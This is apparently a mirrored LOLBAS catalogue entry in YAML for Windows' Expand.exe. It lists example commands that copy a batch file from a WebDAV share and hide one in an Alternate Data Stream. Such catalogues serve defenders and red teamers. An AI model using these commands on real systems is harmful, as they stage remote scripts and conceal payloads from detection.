mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
24 lines
811 B
YAML
24 lines
811 B
YAML
---
|
|
Name: Expand.exe
|
|
Description: Download, Copy, Add ADS
|
|
Author: ''
|
|
Created: '2018-05-25'
|
|
Categories: []
|
|
Commands:
|
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
|
Description: 'Copies source file to destination.'
|
|
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
|
Description: 'Copies source file to destination.'
|
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
|
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
|
|
Full Path:
|
|
- c:\windows\system32\Expand.exe
|
|
- c:\windows\sysWOW64\Expand.exe
|
|
Code Sample: []
|
|
Detection: []
|
|
Resources:
|
|
- https://twitter.com/infosecn1nja/status/986628482858807297
|
|
- https://twitter.com/Oddvarmoe/status/986709068759949319
|
|
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
|
|
|